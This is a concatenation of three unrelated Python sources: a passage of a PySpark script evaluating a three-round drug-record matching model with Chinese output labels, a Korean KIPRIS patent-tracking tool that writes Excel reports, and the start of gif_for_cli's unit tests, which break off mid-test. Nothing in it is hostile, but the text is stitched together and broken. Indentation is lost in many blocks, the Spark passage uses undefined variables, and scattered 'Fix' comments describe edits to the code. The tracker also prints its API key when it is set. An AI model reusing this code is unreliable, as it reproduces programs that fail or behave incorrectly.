print("Test set accuracy = " + str(accuracy))
# 4. Test with Pharbers defined methods
result = predictions
# result.printSchema()
# Split the Jaccard-distance vector into named columns and drop ML internals.
result = result.withColumn("JACCARD_DISTANCE_MOLE_NAME", result.JACCARD_DISTANCE[0]) \
.withColumn("JACCARD_DISTANCE_DOSAGE", result.JACCARD_DISTANCE[1]) \
.drop("JACCARD_DISTANCE", "features", "indexedFeatures").drop("rawPrediction", "probability")
# result.orderBy("id").repartition(1).write.mode("overwrite").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/result")
# Rows flagged positive by either the model or the ground-truth label.
# NOTE(review): df_ph is not used later in this script — kept for inspection.
df_ph = result.where((result.prediction == 1.0) | (result.label == 1.0))
# Total number of distinct candidate ids in the result set.
ph_total = result.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
# Fix: this total was accidentally printed twice.
print("数据总数: " + str(ph_total))
# 5. First-round TP selection: keep only the best-ranked candidate per id.
df_true_positive = similarity(result.where(result.prediction == 1.0))
df_true_positive = df_true_positive.where(df_true_positive.RANK == 1)
ph_positive_prodict = df_true_positive.count()
print("机器判断第一轮TP条目 = " + str(ph_positive_prodict))
ph_positive_hit = result.where((result.prediction == result.label) & (result.label == 1.0)).count()
print("其中正确条目 = " + str(ph_positive_hit))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
# Guard against division by zero when no TPs were predicted.
if ph_positive_prodict == 0:
print("Pharbers Test set accuracy (机器判断第一轮TP比例) = 0")
print("Pharbers Test set precision (机器判断第一轮TP正确率) = 0")
else:
print("Pharbers Test set accuracy (机器判断第一轮TP比例) = " + str(ph_positive_hit / ph_total))
print("Pharbers Test set precision (机器判断第一轮TP正确率) = " + str(ph_positive_hit / ph_positive_prodict))
# for analysis
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 0.0) & (result.label == 1.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/false_negative")
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 1.0) & (result.label == 0.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/false_positive")
# for output
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 1.0) & (result.label == 0.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/prediction")
# 第二轮筛选的方法是:再对dosage列重新计算eff,要用到dosage_mapping
df_second_round = df_candidate.drop("prediction", "indexedLabel", "indexedFeatures", "rawPrediction", "probability", "features")
dosage_mapping = load_dosage_mapping(spark)
df_second_round.show(5)
df_second_round = df_second_round.join(dosage_mapping, df_second_round.DOSAGE == dosage_mapping.CPA_DOSAGE, how="left").na.fill("")
df_second_round = df_second_round.withColumn("EFFTIVENESS_DOSAGE_SE", dosage_replace(df_second_round.MASTER_DOSAGE, \
df_second_round.DOSAGE_STANDARD, df_second_round.EFFTIVENESS_DOSAGE))
df_second_round = df_second_round.withColumn("EFFTIVENESS_PRODUCT_NAME_SE", prod_name_replace(df_second_round.MOLE_NAME, df_second_round.MOLE_NAME_STANDARD, \
df_second_round.MANUFACTURER_NAME, df_second_round.MANUFACTURER_NAME_STANDARD, df_second_round.MANUFACTURER_NAME_EN_STANDARD))
df_second_round = df_second_round.withColumn("EFFTIVENESS_PACK_QTY_SE", pack_replace(df_second_round.EFFTIVENESS_PACK_QTY, df_second_round.SPEC_ORIGINAL, \
df_second_round.PACK_QTY, df_second_round.PACK_QTY_STANDARD))
assembler = VectorAssembler( \
inputCols=["EFFTIVENESS_MOLE_NAME", "EFFTIVENESS_PRODUCT_NAME_SE", "EFFTIVENESS_DOSAGE_SE", "EFFTIVENESS_SPEC", \
"EFFTIVENESS_PACK_QTY_SE", "EFFTIVENESS_MANUFACTURER"], \
outputCol="features")
df_second_round = assembler.transform(df_second_round)
# df_second_round.repartition(10).write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/second_round_dt")
predictions_second_round = model.transform(df_second_round)
predictions_second_round.write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/zyyin/second_round_prediction1106_1")
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions_second_round)
print("Test Error = %g " % (1.0 - accuracy))
print("Test set accuracy = " + str(accuracy))
# Second-round precision check.
df_true_positive_se = predictions_second_round.where(predictions_second_round.prediction == 1.0)
ph_positive_prodict_se = df_true_positive_se.count()
print("机器判断第二轮TP条目 = " + str(ph_positive_prodict_se))
ph_positive_hit_se = df_true_positive_se.where((df_true_positive_se.prediction == df_true_positive_se.label) & (df_true_positive_se.label == 1.0)).count()
print("其中正确条目 = " + str(ph_positive_hit_se))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
if ph_positive_prodict_se == 0:
print("Pharbers Test set accuracy (机器判断第二轮TP比例) = 0")
print("Pharbers Test set precision (机器判断第二轮TP正确率) = 0")
else:
print("Pharbers Test set accuracy (机器判断第二轮TP比例) = " + str(ph_positive_hit_se / count_prediction_se))
print("Pharbers Test set precision (机器判断第二轮TP正确率) = " + str(ph_positive_hit_se / ph_positive_prodict_se))
# 7. Totals accumulated across both rounds.
ph_positive_prodict = ph_positive_prodict + ph_positive_prodict_se
print("两轮判断TP总量 = " + str(ph_positive_prodict))
ph_positive_hit = ph_positive_hit + ph_positive_hit_se
print("两轮判断TP总正确数量 = " + str(ph_positive_hit))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
# NOTE(review): the guard checks ph_positive_prodict_se but the division uses
# ph_total / ph_positive_prodict — ph_total == 0 would still divide by zero;
# confirm upstream guarantees a non-empty result set.
if ph_positive_prodict_se == 0:
print("Pharbers Test set accuracy (两轮判断TP总比例) = 0")
print("Pharbers Test set precision (两轮判断TP总正确率)= 0")
else:
print("Pharbers Test set accuracy (两轮判断TP总比例) = " + str(ph_positive_hit / ph_total))
print("Pharbers Test set precision (两轮判断TP总正确率)= " + str(ph_positive_hit / ph_positive_prodict))
# 8. Third round: exclude ids already matched in rounds 1-2 and rescore the rest.
df_prediction_se = df_true_positive_se.select("id").distinct()
id_local_se = df_prediction_se.toPandas()["id"].tolist()
print(len(id_local))
# Union of round-1 and round-2 matched ids.
id_local_total = id_local_se + id_local
print(len(id_local_total))
df_candidate_third = result.where(~result.id.isin(id_local_total))
count_third = df_candidate_third.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
print("第三轮总量= " + str(count_third))
# Fix: the five statements above were accidentally duplicated verbatim
# (same computation and prints executed twice); the copy was removed.
# Third round: recompute dosage/product-name effectiveness and re-run the model.
df_third_round = df_candidate_third.drop("prediction", "indexedLabel", "indexedFeatures", "rawPrediction", "probability", "features")
# Round 3 reads the dosage mapping directly from parquet (round 2 used load_dosage_mapping).
dosage_mapping = spark.read.parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/cpa_dosage_mapping/cpa_dosage_lst")
df_third_round.show(5)
df_third_round = df_third_round.join(dosage_mapping, df_third_round.DOSAGE == dosage_mapping.CPA_DOSAGE, how="left").na.fill("")
df_third_round = df_third_round.withColumn("EFFTIVENESS_DOSAGE_TH", dosage_replace(df_third_round.MASTER_DOSAGE, \
df_third_round.DOSAGE_STANDARD, df_third_round.EFFTIVENESS_DOSAGE))
# NOTE(review): the "_SE" suffix is reused here even though this is the third
# round; the assembler below expects exactly this column name.
df_third_round = df_third_round.withColumn("EFFTIVENESS_PRODUCT_NAME_SE", prod_name_replace(df_third_round.MOLE_NAME, df_third_round.MOLE_NAME_STANDARD, \
df_third_round.MANUFACTURER_NAME, df_third_round.MANUFACTURER_NAME_STANDARD, df_third_round.MANUFACTURER_NAME_EN_STANDARD))
# Round 3 keeps the original pack-qty effectiveness (no "_SE" recompute).
assembler = VectorAssembler( \
inputCols=["EFFTIVENESS_MOLE_NAME", "EFFTIVENESS_PRODUCT_NAME_SE", "EFFTIVENESS_DOSAGE_TH", "EFFTIVENESS_SPEC", \
"EFFTIVENESS_PACK_QTY", "EFFTIVENESS_MANUFACTURER"], \
outputCol="features")
df_third_round = assembler.transform(df_third_round)
# df_second_round.repartition(10).write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/second_round_dt")
predictions_third_round = model.transform(df_third_round)
predictions_third_round.write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/zyyin/third_round_prediction1106_2")
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions_third_round)
print("Test Error = %g " % (1.0 - accuracy))
print("Test set accuracy = " + str(accuracy))
# Third-round precision check.
df_true_positive_th = predictions_third_round.where(predictions_third_round.prediction == 1.0)
ph_positive_prodict_th = df_true_positive_th.count()
# Fix: resolved the leftover merge conflict markers here; the local version
# (which reports the third-round TP count) is kept.
print("机器判断第三轮TP条目 = " + str(ph_positive_prodict_th))
# source file: source_code/patent_tracker.py
import asyncio
import time
import os
from datetime import datetime, date, timedelta
import aiohttp
from bs4 import BeautifulSoup
from typing import Union, List, Tuple, Iterator, Iterable, Dict
import openpyxl
from default_style import info_style, field_style, record_style, sheet_style
import string
# Locations of the API key file, the input workbook, and the output folder,
# relative to the directory this script is run from.
api_key_path = "../input_setting/api_key.txt"
input_path = "../input_setting/input.xlsx"
output_directory = "../output"
## FYI ##
#current version: v1.0
#Comments & Docstring: English (for developers)
#print message: Korean (for consumers)
#TODO before 2.0:
# 1. Crawling via Selenium -> (despite its heaviness) works without an api_key.
# 2. More output formats: to_img(), to_csv()
class PatentTracker():
"""Creates PatentTracker instance.
Consists of 4 kinds of methods
I. GETTERS AND SETTERS: api_key, since, before, targets, results
II. SETTINGS AND INPUT: read_and_check_api_key, read_input
III. TRACKING: track_patents
IV. OUTPUT: to_excel and private methods
-- Quick Example --
tracker = PatentTracker()
time1 = time.time()
loop = asyncio.get_event_loop()
loop.run_until_complete(tracker.track_patents())
loop.close
time2 = time.time()
print(f"total time taken: {time2-time1}")
tracker.to_excel()
"""
def __init__(self):
# KIPRIS API access key (set via read_and_check_api_key).
self.__api_key: str = ""
# Generator of 13-digit application-number strings (set via read_input).
self.__targets: Iterator = (i for i in [])
# Date window for filtering records; defaults to "everything up to now".
self.__since:date = date(1970,1,1)
self.__before:date = datetime.now().date()
# application number -> tuple of extra columns from the input workbook.
self.__additional_info_dict: Dict = {}
# Filled by track_patents(): [(application_number, result_2D_table), ...]
self.__results: List = []
# Both the input workbook and the API key file are required to exist.
if os.path.exists(input_path): self.read_input(input_path)
else: raise FileNotFoundError(f"{input_path} 를 찾을 수 없습니다.")
if os.path.exists(api_key_path): self.read_and_check_api_key(api_key_path)
else: raise FileNotFoundError(f"{api_key_path}를 찾을 수 없습니다.")
############### I. GETTERS AND SETTERS ###############
@property
def api_key(self):
return self.__api_key
@api_key.setter
def api_key(self, api_key:str):
# Strip whitespace/newline picked up when reading the key from a file.
self.__api_key = api_key.strip()
print(f"tracker.api_key is now {self.__api_key}")
@property
def since(self):
return self.__since
@since.setter
def since(self, new_since):
# Accept a datetime or a string; normalize " ", "." and "-" separators
# to "/" before parsing, so "2020.01.02" and "2020-01-02" both work.
if isinstance(new_since, datetime):
new_since = datetime.strftime(new_since, "%Y/%m/%d")
new_since = "/".join(new_since.split(" "))
new_since = "/".join(new_since.split("."))
new_since = "/".join(new_since.split("-"))
self.__since = datetime.strptime(new_since, "%Y/%m/%d").date()
print(f"tracker.since is set as {self.__since}")
@property
def before(self):
return self.__before
@before.setter
def before(self, new_before):
# Same normalization as the `since` setter.
if isinstance(new_before, datetime):
new_before = datetime.strftime(new_before, "%Y/%m/%d")
new_before = "/".join(new_before.split(" "))
new_before = "/".join(new_before.split("."))
new_before = "/".join(new_before.split("-"))
self.__before = datetime.strptime(new_before, "%Y/%m/%d").date()
print(f"tracker.before is set as {self.__before}")
@property
def targets(self):
return self.__targets
@targets.setter
def targets(self, targets: List[str]):
# Reject any application number that is not exactly 13 characters.
weird_input = [target for target in targets if len(target) != 13]
if weird_input:
raise ValueError(
# "Some input elements does not satisfy condition." + "\n" +
# "Please check following elements and make sure they are 13 digit" +"\n" +
# f"{weird_input}"
"일부 타겟 정보가 올바르지 않습니다.\n"+
"아래 출원번호값들을 확인 해 주세요.\n"+
f"{weird_input}\n"+
"출원번호는 13자리 숫자 값이어야 합니다."
)
# NOTE(review): after the check above every target has len == 13, so the
# else-branch (stripping "-") is unreachable — confirm intended behavior.
targets_gen = (target if len(target)==13 else "".join(target.split("-")) for target in targets)
self.__targets = targets_gen
print("타겟 입력 성공.")
# print("successfully fetched targets. ")
@property
def additional_info_dict(self):
return self.__additional_info_dict
@property
def results(self):
return self.__results
############### II. LOAD SETTINGS, INPUT ###############
# Read the first line of the key file; adopt it only if check_api_key passes,
# otherwise keep the previously stored key.
def read_and_check_api_key(self, path:str, verbose=False):
with open(path, "r") as text:
api_key = text.readline()
if verbose: print("API key를 api_key.txt 로부터가져왔습니다.")
#print(f"Read api_key from api_key.txt as : {api_key}")
if self.check_api_key(api_key):
# Assignment goes through the api_key setter, which strips whitespace.
self.api_key = api_key
else:
print("읽어온 API key가 유효하지 않습니다. 기존 값으로 유지됩니다.")
print(f"읽어온 key 값: {api_key}")
print(f"현재 API key: {self.__api_key}")
#TODO:
# Stub: real validation (a probe request against the KIPRIS API, sketched in
# the commented code) is not implemented yet — this always accepts the key.
def check_api_key(self, api_key):
# print(f"checking api_key vailidy")
# import urllib
# url = 'http://plus.kipris.or.kr/openapi/rest/RelatedDocsonfilePatService/relatedDocsonfileInfo'
# query = f'?applicationNumber=1019940701319&accessKey={api_key}'
# urllib.request(url+query)
return True
def read_input(self, input_path:str=input_path, verbose=False):
    """Read tracking input from an xlsx workbook and populate instance state.

    Sheet 'targets' (fallback: 'Sheet1'): application numbers in column A,
    rows 3..5000, with additional info in columns B..F.
    Sheet 'dates' (fallback: 'Sheet2'): either a "last n days" value in C2,
    or an explicit since/before pair in C3/C4.

    Sets self.targets, self.__additional_info_dict, self.since, self.before.

    Argument(s)
    - input_path:str = input_path
    """
    targets: List[str] = []
    additional_info_dict: Dict = {}
    if not os.path.exists(input_path):
        print(f"{input_path} 파일이 존재하지 않습니다.")
        # print(f"file does not exist in the path: {input_path}")
        return
    wb = openpyxl.load_workbook(input_path)  # Read xl file
    if verbose: print(f"{input_path}로 부터 인풋 값을 불러옵니다.")
    # Fetching application numbers from sheet 'targets'
    try:
        target_sheet = wb['targets']
    except KeyError:
        print(f"{input_path} 에 'targets' 시트가 존재하지 않습니다.")
        # Bug fix: the fallback actually opens 'Sheet1', but the old message
        # claimed 'Sheet2'; the message now matches the code.
        print("'Sheet1' 시트로 부터 타겟 정보를 불러옵니다.")
        target_sheet = wb['Sheet1']
    for row in target_sheet.iter_rows(min_row=3, max_row=5000, max_col=6, values_only=True):
        if row[0] is None:
            continue
        targets.append(str(row[0]))  # application number
        additional_info_dict[str(row[0])] = row[1:]  # additional info of target patent
    self.targets = targets  # the setter stores these as a generator
    if verbose:
        print(f"targets[:3]: {targets[:3]}")
        print(f"self.targets: {self.targets}")
    self.__additional_info_dict = additional_info_dict
    if verbose:
        print("타겟 정보를 성공적으로 불러왔습니다.")
        print(f"타겟 수: {len(targets)}")
        print(f"첫번째 타겟 출원번호: {list(self.additional_info_dict.keys())[0]}")
        print(f"첫번째 타겟 부가정보: {list(self.additional_info_dict.values())[0]}")
    # Reading date info from sheet 'dates'
    try:
        dates_sheet = wb['dates']
    except KeyError:
        print(f"{input_path} 에 'dates' 시트가 존재하지 않습니다.")
        # print("Current excel file doesn't have a sheet named 'dates'")
        print(f"'Sheet2' 시트로 부터 날짜구간 정보를 불러옵니다.")
        # print("worksheet 'Sheet2' will be open instead of worksheet 'dates'")
        dates_sheet = wb['Sheet2']
    # Bug fix: C2 may be empty (None); abs(None) previously raised TypeError.
    last_n = dates_sheet['C2'].value
    last_n_day = abs(last_n) if last_n else 0
    if last_n_day:
        # "Last n days" mode: window ends today.
        self.__before = datetime.now().date()
        self.__since = self.__before - timedelta(days=last_n_day)
    else:
        # Explicit window mode: parsed/normalized by the property setters.
        self.since = dates_sheet['C3'].value
        self.before = dates_sheet['C4'].value
############### III. TRACKING ###############
async def track_patents(self, verbose=False):
"""Asynchronously tracks patents in self.targets
Simply operates by repeating self.track_patent()
Saves a list containing tuples at self.__results.
[(application_number, result_2D_table), (...), ...]
"""
# returned values of each task will be appended into an empty list and then returned.
# NOTE: self.targets is a generator — it is consumed here and cannot be reused.
futures = [asyncio.ensure_future(self.track_patent(patent, verbose=verbose)) for patent in self.targets]
futures_results = None  # (placeholder removed)
results = await asyncio.gather(*futures)
## this code will work synchronously -> compare with async
# results = []
# for patent in self.targets:
# results.append(await self.track_patent(patent))
# print(results)
self.__results = results
if verbose:
print(f"특허 트래킹 완료.")
print(f"첫 특허의 출원번호: {results[0][0]}")
print(f"첫 특허의 결과 테이블 일부: {results[0][1][:3]}")
async def track_patent(self, patent, verbose=False):
""" Requests information of a patent and filter_out unneccesary information.
Returns a tuple: (application_number, 2-dimensional result table).
"""
# Fetch + parse the KIPRIS response, then filter by the date window.
records = await self.request_and_parse_kipris_API(application_number = patent, api_key = self.api_key, verbose=verbose)
#print(f"records: {records}")
result_table = await self.filter_records(records, verbose=verbose)
# self.__result_dict[patent] = result_table
return (patent, result_table)
async def request_and_parse_kipris_API(self, application_number, api_key, verbose=False):
    """Fetch related-document info for one application number from the KIPRIS REST API.

    Performs a non-blocking HTTP GET via aiohttp (so many patents can be
    fetched concurrently), parses the XML response with BeautifulSoup, and
    returns the list of <relateddocsonfileInfo> tags (possibly empty).
    """
    url = 'http://plus.kipris.or.kr/openapi/rest/RelatedDocsonfilePatService/relatedDocsonfileInfo'
    query = f'?applicationNumber={application_number}&accessKey={api_key}'
    time1 = time.time()
    if verbose: print(f"request for patent:{application_number} started.")
    # request by aiohttp
    async with aiohttp.ClientSession() as session:
        async with session.get(url + query) as response:
            text = await response.text()
    time2 = time.time()
    if verbose: print(f"request for patent:{application_number} finished. time:{time2-time1}")
    # parse
    soup = BeautifulSoup(text, "xml")
    records = soup.find_all('relateddocsonfileInfo')
    if records == []:
        # Bug fix: soup.find() returns None when the tag is absent, which
        # previously raised AttributeError on `.text`.
        msg = soup.find('resultMsg')
        print("No records detected. Please check result message ")
        print(f"result_message: {msg.text if msg is not None else '(no resultMsg in response)'}")
    return records
async def filter_records(self, records, verbose=False):
""" Filters out unnecessary records and fields.
Returns a 2-dimensional list.
"""
filtered_records = []
time1 = time.time()
for i, record in enumerate(records):
ymd = record.documentDate.text
record_date = date(int(ymd[:4]), int(ymd[4:6]), int(ymd[6:8]))
if record_date < self.since or record_date > self.before:
continue
else:
filtered_records.append([
i+1, #n-th record
record.documentTitle.text, #서류명
record.documentDate.text, #접수/발송 일자
record.status.text, #처리상태
record.step.text, #단계 (출원/등록 등.)
record.trialNumber.text, #심판 번호
record.registrationNumber.text #등록 번호
])
time2 = time.time()
if verbose: print(f"filtering records from a patent finished. time:{time2-time1}")
return filtered_records
############### OUTPUT ###############
def to_excel(self, verbose=False):
    """Save self.results as a timestamped .xlsx file under output_directory.

    One section per tracked patent: a title row (application number), an
    additional-info row, a field-header row, then the record rows.
    Does nothing (beyond a message) when there are no results.
    """
    print(self.results)
    if self.results == []:
        print("결과 값이 없습니다. 엑셀파일을 생성하지 않고 종료합니다.")
        #print("No results exists. Execute self.track_patents() to get results ")
        return
    # Create excel file
    if verbose: print("엑셀 파일 작성을 시작합니다.")
    result_wb = openpyxl.Workbook()
    result_ws = result_wb.active
    result_ws.title = 'result'
    # Apply sheet_style: set the width of columns A..F.
    # Bug fix: the old code assigned the raw width number to
    # column_dimensions[letter], replacing the ColumnDimension object;
    # the width attribute must be set instead.
    for letter in string.ascii_uppercase[:6]:
        result_ws.column_dimensions[letter].width = sheet_style[f"col_{letter}_width"]
    current_row = 1
    # Write data: one block of rows per patent.
    for result in self.results:
        application_number = result[0]
        result_table = result[1]
        self._write_title(result_ws, current_row, title="출원번호: " + application_number)
        current_row += 1
        self._write_info(result_ws, current_row, additional_info=self.additional_info_dict[application_number])
        current_row += 1
        self._write_fields(result_ws, current_row)
        current_row += 1
        self._write_records(result_ws, current_row, records=result_table)
        # Leave one blank row between patent sections.
        current_row += len(result_table) + 2
        # print(f"출원번호 {application_number} 의 결과테이블 작성 완료.")
    # Save under a timestamped name so repeated runs never overwrite output.
    timestamp = time.strftime("%y%m%d_%H%M%S")
    output_name = output_directory + f"/output_{timestamp}.xlsx"
    result_wb.save(output_name)
    if verbose: print(f'엑셀 파일 {output_name} 저장을 완료했습니다.')
def _write_title(self, result_ws, current_row, title):
# default_title: application number.
result_ws.merge_cells(f'A{current_row}:F{current_row}')
result_ws[f'A{current_row}'].value = title
result_ws[f'A{current_row}'].style = info_style
def _write_info(self, result_ws, current_row, additional_info):
#result_ws[f'A{current_row}'].value = info_0
for i,j in enumerate('BCDEF'):
result_ws[f'{j}{current_row}'].value = additional_info[i] #info: from input.xlsx
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style = info_style
def _write_fields(self, result_ws, current_row):
fields = ["번호", "서류명", "접수/발송일자", "처리단계", "단계", "심판/등록 번호"]
for i,j in zip(fields, 'ABCDEF'):
result_ws[f'{j}{current_row}'].value = i
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style=field_style
# records = 2D array (list) n*5
def _write_records(self, result_ws, current_row, records):
for row in records:
number, document_title, document_date, status, step, trial_number, registration_number = row
for i,j in zip(row[:5],'ABCDE'): #번호, 서류명, 접수/발송일자, 처리상태, 단계
result_ws[f'{j}{current_row}'].value = i
if trial_number !=' ':
result_ws[f'F{current_row}'].value = trial_number #심판번호
elif registration_number !=' ':
result_ws[f'F{current_row}'].value = registration_number #등록번호
for row in result_ws[f"A{current_row}":f"F{current_row}"]:
for cell in row:
cell.style=record_style
current_row += 1
class DrugPatentTracker(PatentTracker):
    """PatentTracker variant for drug patents: the info row carries
    item / holders / patent class / patent number in columns B, C, D and F,
    and the title row is the bare application number (no prefix)."""
    # Overrides _write_info: additional_info has a drug-specific layout.
    def _write_info(self, result_ws, current_row, additional_info):
        item, authorization_holder, patent_holder, patent_class, patent_number = additional_info
        result_ws[f'B{current_row}'].value = item #item name
        result_ws[f'C{current_row}'].value = authorization_holder+"/"+patent_holder #authorization holder / patent holder
        result_ws[f'D{current_row}'].value = patent_class #patent class
        result_ws[f'F{current_row}'].value = patent_number #patent number
        for row in result_ws[f"A{current_row}":f"F{current_row}"]:
            for cell in row:
                cell.style = info_style
    # As _write_info was overridden, to_excel also needs to be overridden.
    # NOTE(review): this duplicates the parent almost entirely; the visible
    # differences are the bare application-number title and the explicit
    # super() calls. Parent already dispatches _write_info via self.
    def to_excel(self, verbose=False):
        """Saves result as an excel file(.xlsx)
        """
        if self.results == []:
            print("결과 값이 없습니다. 엑셀파일을 생성하지 않고 종료합니다.")
            #print("No results exists. Execute self.track_patents() to get results ")
            return
        # Create excel file
        if verbose: print("엑셀 파일 작성을 시작합니다.")
        result_wb = openpyxl.Workbook()
        result_ws = result_wb.active
        result_ws.title = 'result'
        # Apply sheet_style (column widths for columns A-F)
        for letter in string.ascii_uppercase[:6]:
            result_ws.column_dimensions[letter].width = sheet_style[f"col_{letter}_width"]
        current_row = 1
        # Write data
        for result in self.results:
            application_number = result[0]
            result_table = result[1]
            super()._write_title(result_ws, current_row, title=application_number)
            current_row += 1
            self._write_info(result_ws, current_row, additional_info=self.additional_info_dict[application_number])
            current_row += 1
            super()._write_fields(result_ws, current_row)
            current_row += 1
            super()._write_records(result_ws, current_row, records=result_table)
            # +2 leaves one blank row between application blocks.
            current_row += len(result_table)+2
        # Save with a timestamp so repeated runs never overwrite each other.
        timestamp = time.strftime("%y%m%d_%H%M%S")
        output_name = output_directory + f"/output_{timestamp}.xlsx"
        result_wb.save(output_name)
        if verbose: print(f'엑셀 파일 {output_name} 저장을 완료했습니다.')
if __name__ == "__main__":
    # Pick the tracker implementation from the "output_type" sheet of the
    # input workbook (cell C4): "DRUG" -> DrugPatentTracker, otherwise the
    # generic PatentTracker.
    wb = openpyxl.load_workbook(input_path)  # Read xl file
    ws = wb['output_type']
    output_type = ws['C4'].value.strip().upper()
    if output_type == "DRUG":
        tracker = DrugPatentTracker()
    elif False:  # output_type == "SEMICONDUCTOR": reserved, not implemented
        pass
    else:  # output_type == "NORMAL"
        tracker = PatentTracker()
    time1 = time.time()
    loop = asyncio.get_event_loop()
    loop.run_until_complete(tracker.track_patents(verbose=True))
    # BUG FIX: `loop.close` was a bare attribute access and never actually
    # closed the event loop; it must be called.
    loop.close()
    time2 = time.time()
    print(f"total time taken: {time2-time1}")
    tracker.to_excel(verbose=True)
"""
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import unittest
from unittest.mock import patch, Mock
from PIL import Image
from gif_for_cli.generate.utils import (
avg,
get_gray,
get_256_cell,
get_truecolor_cell,
get_avg_for_em,
process_input_source,
)
from ..fixtures import empty_gif_response, gif_response
api_key = '<KEY>'
class TestAvg(unittest.TestCase):
    """Tests for avg(): arithmetic mean that always yields a float."""

    def test_empty_input_raises_error(self):
        # Averaging an empty sequence divides by zero.
        with self.assertRaises(ZeroDivisionError):
            avg([])

    def test_single_int_in_float_out(self):
        result = avg([1])
        self.assertEqual(result, 1.0)
        self.assertEqual(type(result), float)

    def test_ints_in_float_out(self):
        result = avg([1, 2])
        self.assertEqual(result, 1.5)
        self.assertEqual(type(result), float)

    def test_floats_in_float_out(self):
        result = avg([1.1, 2.2])
        self.assertAlmostEqual(result, 1.65)
        self.assertEqual(type(result), float)
class TestGetGray(unittest.TestCase):
    """Test for get_gray() on one representative RGB triple."""

    def test(self):
        # (0 + 128 + 255) / 3 == 127.666...
        result = get_gray(0, 128, 255)
        self.assertAlmostEqual(result, 127.66666666)
class TestGet256Cell(unittest.TestCase):
    """Test for get_256_cell(): 256-color ANSI escape for a pixel."""

    def test(self):
        cell = get_256_cell(0, 128, 255)
        # Palette index 33 in the 38;5;N (256-color) escape sequence.
        self.assertEqual(cell, u'\u001b[38;5;33m#')
class TestGetTruecolorCell(unittest.TestCase):
    """Test for get_truecolor_cell(): 24-bit ANSI escape for a pixel."""

    def test(self):
        cell = get_truecolor_cell(0, 128, 255)
        # Direct R;G;B channels in the 38;2;R;G;B (truecolor) escape.
        self.assertEqual(cell, u'\u001b[38;2;0;128;255m#')
class TestGetAvgForEm(unittest.TestCase):
    """Tests for get_avg_for_em(): averaging a 2x2 pixel block of an image."""

    def setUp(self):
        # 100x100 all-black RGB image; px is PIL's pixel-access object.
        self.im = Image.new('RGB', (100, 100,))
        self.px = self.im.load()
        self.black = [0, 0, 0,]
        self.white = [255, 255, 255,]
        self.gray = [128, 128, 128,]

    def assertColor(self, out, color):
        """The averaged color must match exactly and each channel be an int."""
        self.assertEqual(out, color)
        for v in out:
            self.assertEqual(type(v), int)

    def test_default_black_block(self):
        # BUG FIX: the first get_avg_for_em call was accidentally duplicated
        # (two identical calls in a row); the redundant call is removed.
        out = get_avg_for_em(self.px, 0, 0, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 2, 0, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 0, 2, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 2, 2, 2, 2)
        self.assertColor(out, self.black)

    def test_white_block(self):
        # Paint the top-left 2x2 block white; other blocks stay black.
        self.im.putpixel((0, 0,), tuple(self.white))
        self.im.putpixel((1, 0,), tuple(self.white))
        self.im.putpixel((0, 1,), tuple(self.white))
        self.im.putpixel((1, 1,), tuple(self.white))
        out = get_avg_for_em(self.px, 0, 0, 2, 2)
        self.assertColor(out, self.white)
        out = get_avg_for_em(self.px, 2, 0, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 0, 2, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 2, 2, 2, 2)
        self.assertColor(out, self.black)

    def test_gray_block(self):
        # Half the block white, half black -> averages to (127.5 ->) 128.
        self.im.putpixel((0, 0,), tuple(self.white))
        self.im.putpixel((0, 1,), tuple(self.white))
        out = get_avg_for_em(self.px, 0, 0, 2, 2)
        self.assertColor(out, self.gray)
        out = get_avg_for_em(self.px, 2, 0, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 0, 2, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 2, 2, 2, 2)
        self.assertColor(out, self.black)

    def test_separate_color_channels(self):
        # color1/color2 are channel-mirrored, so averaging them yields gray
        # in every channel; each channel must be averaged independently.
        color1 = (0, 128, 255,)
        color2 = (255, 128, 0,)
        self.im.putpixel((0, 0,), color1)
        self.im.putpixel((1, 0,), color1)
        self.im.putpixel((0, 1,), color1)
        self.im.putpixel((1, 1,), color1)
        self.im.putpixel((2, 0,), color1)
        self.im.putpixel((3, 0,), color1)
        self.im.putpixel((2, 1,), color2)
